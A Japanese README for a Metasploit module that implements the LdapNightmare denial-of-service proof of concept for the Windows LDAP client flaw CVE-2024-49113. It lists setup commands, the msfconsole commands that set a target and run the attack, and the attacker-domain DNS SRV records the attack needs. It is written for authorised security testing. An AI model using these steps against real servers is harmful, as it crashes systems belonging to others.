
SafeBreaches CVE-2024-49113 POC(LdapNightmare)がMetasploitに統合されました。
SafeBreachesのCVE-2024-49113 POC(LdapNightmare)をMetasploitに統合
このモジュールは、Windows LDAPクライアントの重大な脆弱性であるCVE-2024-49113を実装し、システムの不安定性を引き起こす可能性があります。このモジュールはMetasploit Frameworkと統合され、この脆弱性に対するシステムの耐性をテストする信頼性の高い方法を提供します。
ldaptor
impacket
必要なPythonパッケージをインストールします:
pip install -r requirements.txt
モジュールをMetasploitモジュールディレクトリに配置します:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
モジュールが実行可能であることを確認します:
chmod +x ldapnightmare.py
msfconsoleを起動します:
msfconsole
モジュールをロードして設定します:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - ターゲットアドレス(必須)RPORT - RPCのターゲットポート(デフォルト:49664)LPORT - LDAPサーバーのローカルポート(デフォルト:389)DOMAINNAME - 攻撃者のドメイン名(必須)。このドメインは特定のDNS SRVレコードが設定されている必要があります(以下のドメイン設定を参照)ACCOUNT - ターゲットアカウント名(デフォルト:Administrator)SITENAME - ターゲットサイト名(デフォルト:空)DOMAINNAMEパラメーターは、特定のDNS SRVレコードが設定されている必要があります。ドメインには以下の2つのSRVレコードが必要です:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostname重要な注意: 攻撃者のマシンのホスト名は、被害サーバーがNBNSを使用して解決できる場合にのみ機能します。代わりに、ホスト名をLDAPサーバーのIPアドレスを指すドメイン名に置き換えることもできます。
このモジュールは3つの主要な段階で動作します:
このモジュールは、許可されたセキュリティテストおよび研究目的のみを対象としています。ユーザーは、所有権を持っていない、またはテストする許可を得ていないシステムをテストする前に、適切な承認を得る必要があります。
このモジュールはBSD 3-Clause Licenseの下でリリースされています。
この作品には以下から派生したコードが含まれています:
完全なライセンス文はLICENSESファイルにあります。